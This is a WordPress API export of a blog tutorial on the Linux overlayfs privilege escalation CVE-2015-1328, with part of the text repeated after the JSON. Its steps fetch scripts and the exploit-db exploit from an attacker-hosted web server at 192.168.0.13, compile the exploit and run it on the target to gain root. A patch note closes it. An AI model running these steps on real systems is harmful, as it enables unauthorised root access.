{"id":1016,"date":"2021-03-11T22:40:47","date_gmt":"2021-03-11T14:40:47","guid":{"rendered":"https:\/\/byy3.com\/?p=1016"},"modified":"2021-03-11T22:41:28","modified_gmt":"2021-03-11T14:41:28","slug":"overlayfs-local-privilege-escalation-cve-2015-1328-exploit-c","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=1016","title":{"rendered":"‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c"},"content":{"rendered":"

The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace. (https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2015-1328<\/a>)<\/p>\n

Ubuntu could allow a local attacker to gain elevated privileges on the system, caused by incorrect permission checks when creating new files in the upper filesystem directory by the overlayfs filesystem. An attacker could exploit this vulnerability to gain root privileges on the system. Note: This vulnerability also affects Cloud Foundry. (https:\/\/exchange.xforce.ibmcloud.com\/vulnerabilities\/103882<\/a>)<\/p>\n

\n
(Ubuntu 14.04\/15.10)<\/li>\n

Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04<\/li>\n<\/ul>\n
Affected kernel<\/strong><\/p>\n
\n
Linux Kernel 4.3.3<\/li>\n
Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)<\/li>\n<\/ul>\n
For more info<\/p>\n
https:\/\/seclists.org\/oss-sec\/2015\/q2\/717<\/a><\/p>\n
https:\/\/www.securityfocus.com\/bid\/75206\/info<\/a><\/p>\n
https:\/\/www.exploit-db.com\/exploits\/37293<\/a><\/p>\n
$\"‘overlayfs’$ <\/p>\n
Identification<\/strong><\/h2>\n
1. We should already have access to the machine, since, this is a post-exploitation activity, and the attack is done locally. First thing we need to do is identify the kernel version<\/p>\n
\n
lsb_release -a<\/li>\n<\/ul>\n
$\"‘overlayfs’$ <\/p>\n
2. check the kernel version<\/p>\n
\n
uname -a<\/li>\n<\/ul>\n
$\"‘overlayfs’$ <\/p>\n
Note: It was identified at the 4.3.3 version. So, we are on good track with 3.13.0, older version.<\/p>\n
3. To make sure this is vulnerable, let\u2019s run a script that detects possible vulnerabilities. linux-exploit suggester (see how to use\u00a0 https:\/\/vk9-sec.com\/linux-exploit-suggester-enumeration-linux-kernellinux-based-machine\/<\/a>)<\/p>\n
Source code (https:\/\/github.com\/mzet-\/linux-exploit-suggester<\/a>)<\/p>\n
\n
cd \/tmp<\/li>\n
wget http:\/\/192.168.0.13:9999\/linux-exploit-suggester.sh<\/li>\n
chmod 777 linux-exploit-suggester.sh<\/li>\n
.\/linux-exploit-suggester.sh<\/li>\n<\/ul>\n
$\"‘overlayfs’$ <\/p>\n
Note: Highly vulnerable, means this is likely to have success.<\/p>\n
Execution<\/strong><\/h2>\n
1. Download the exploit to your Kali\/Parrot machine, and share it by any means with the remote server. I\u2019d use a python web server<\/p>\n
\n
wget https:\/\/www.exploit-db.com\/download\/37292<\/li>\n
mv 37292 exploit.c<\/li>\n
ls -l exploit.c<\/li>\n
python3.9 -m http.server 9999<\/li>\n<\/ul>\n
$\"‘overlayfs’$ <\/p>\n
2. In the remote server access the Kali web server, and download the script in \/tmp<\/p>\n
\n
wget http:\/\/192.168.0.13:9999\/exploit.c<\/li>\n<\/ul>\n
$\"‘overlayfs’$ <\/p>\n
3. Proceed to compile, and, execute the script<\/p>\n
\n
gcc exploit.c -o exploit<\/li>\n
.\/exploit<\/li>\n
whoami<\/li>\n
hostname<\/li>\n<\/ul>\n
$\"‘overlayfs’$ <\/p>\n
Remedy<\/strong><\/h2>\n
Apply the patch for this vulnerability, available from the Ubuntu GIT Repository.<\/p>\n
For Cloud Foundry Elastic Runtime:<\/p>\n
Upgrade to the latest version (1.4.5 or later), available from the Pivotal Web site.<\/p>\n","protected":false},"excerpt":{"rendered":"
The overlayfs implementation in the linux (aka Linux ke […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[230,146],"class_list":["post-1016","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-linux-shell","tag-linux"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1016","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1016"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1016\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1016"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1016"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1016"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

Identification<\/strong><\/h2>\n1. We should already have access to the machine, since, this is a post-exploitation activity, and the attack is done locally. First thing we need to do is identify the kernel version<\/p>\n\nlsb_release -a<\/li>\n<\/ul>\n<\/p>\n2. check the kernel version<\/p>\n